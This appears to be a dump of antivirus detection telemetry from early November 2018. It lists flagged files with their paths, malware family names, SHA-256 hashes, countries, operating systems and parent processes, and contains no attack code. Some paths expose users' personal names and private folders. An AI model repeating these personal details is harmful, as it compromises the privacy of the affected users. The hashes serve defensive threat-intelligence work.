  Row(detection=Row(filename='avscan-20181102-050653-15a6a94f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050653-15A6A94F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:13:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062427-eb20e4fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062427-EB20E4FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062245-aec6a127', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062245-AEC6A127', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053718-54ef1131', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053718-54EF1131', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='G:\\PUBLICA\\Cida\\AIDF\\backup NF-e\\ARQUIVOS ANTIGOS\\Diversos\\Marcelo 23072009\\Andrea-Camila\\PASTA\\Declarações\\Dirf2006\\UNWISE.EXE', filesize=128000, name='TR/Crypt.XPACK.ilzsk.#M1.#R1'), hash='78d9a17c8ed438abba962d1bc61e851f232b0c4977775a583505710a73400c1d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:03:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052032-fdcbf1a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052032-FDCBF1A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062126-7fa8e1fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062126-7FA8E1FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055919-68d7b531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055919-68D7B531', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:47:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:30:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:44:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055718-20693f56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055718-20693F56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060953-e29a0478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060953-E29A0478', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060945-ddcc5703', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060945-DDCC5703', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051141-c0f60831', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051141-C0F60831', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060124-b32535b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060124-B32535B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062205-96843692', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062205-96843692', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='story.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Yamcha\\story\\story.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='7b00a7a03c430bdb216adbbaed1fff14d4a5fb90194c28708dc1e11ea472b476', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwheef8.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHEEF8.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:30:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T21:44:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160222-020ea5a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160222-020EA5A7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhd44', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHD44', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:33:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='399413336734193.exe', filepath='\\\\?\\C:\\Temp\\399413336734193.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1cf172edf1ab698059a0eb729bc4ebae80f7469d194ca47c58a4dfae2c9251b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1CF172EDF1AB698059A0EB729BC4EBAE80F7469D194CA47C58A4DFAE2C9251B4', filesize=432000, name='ADWARE/Adware.Gen.#M300.#R1885'), hash='1cf172edf1ab698059a0eb729bc4ebae80f7469d194ca47c58a4dfae2c9251b4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename=' lpa 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\LEMBURAN  LPA 2015\\ LPA 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171444-9d1f4738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171252-890460EC\\AVSCAN-20181101-171444-9D1F4738', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:14:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:12:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161528-ec58a517', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161528-EC58A517', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1e7ebb456d8b1d0cfbb646f0374da6f987bf4c7b141db293d667c65aeabb09c0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2wzo8rnm4l.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsrF910.tmp\\2wzo8rnm4l.exe', filesize=64000, name='HEUR/AGEN.1029958.#M1.#R1'), hash='26c730ce61d82c2715b0b3be3708f9e2fbe54b290b3d9a156dcc712fb89bd489', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T13:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154617-5f9279ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154617-5F9279BA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:58:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154925-7f51aa70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154925-7F51AA70', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155439-b433873a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155439-B433873A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A536\\Working\\Lenovo_A536_S186_150813_ROW_(by_firmwarefile.com)\\Lenovo_A536_S186_150813_ROW\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='2387bab6aca052ea4474c91d80d3c2cdd44ad807d2576fc0c85ab63a2da207f2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:31:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161627-f27fba75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161627-F27FBA75', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155231-9e9b13d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155231-9E9B13D5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2081432\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\insidious-programas-gratis-net_0307176659.exe', parentsize=2308292, timestamp='2018-11-01T00:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160315-0b001846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160315-0B001846', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190711-062b14e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190711-062B14E2', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e8e4707ca2468b241a727b7ea430220663115263e6cb3f2a60af723b6b174073', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E8E4707CA2468B241A727B7EA430220663115263E6CB3F2A60AF723B6B174073', filesize=1408000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='e8e4707ca2468b241a727b7ea430220663115263e6cb3f2a60af723b6b174073', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:32:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='feedingfrenzy.exe', filepath='\\?\\J:\\العاب2\\السمكة 1\\FeedingFrenzy.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='56d883f54f9d360d038388653eb7f270c4210691b8975f9a1bee56b9f7b95a9e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161310-dddb1862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161310-DDDB1862', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='7d5d2c613b9756c34903403e6e5c0f01efc402e1472ca198eb0a7534c354ead1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-073347-b9d93d02', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-073316-73881F52\\AVSCAN-20181101-073347-B9D93D02', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\999577E42D9D2224FC8665043A6DC2A2AA7711221FE449CA1D3DB123709219B1', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:14:34Z'), dt=datetime.date(2018, 11, 1)),
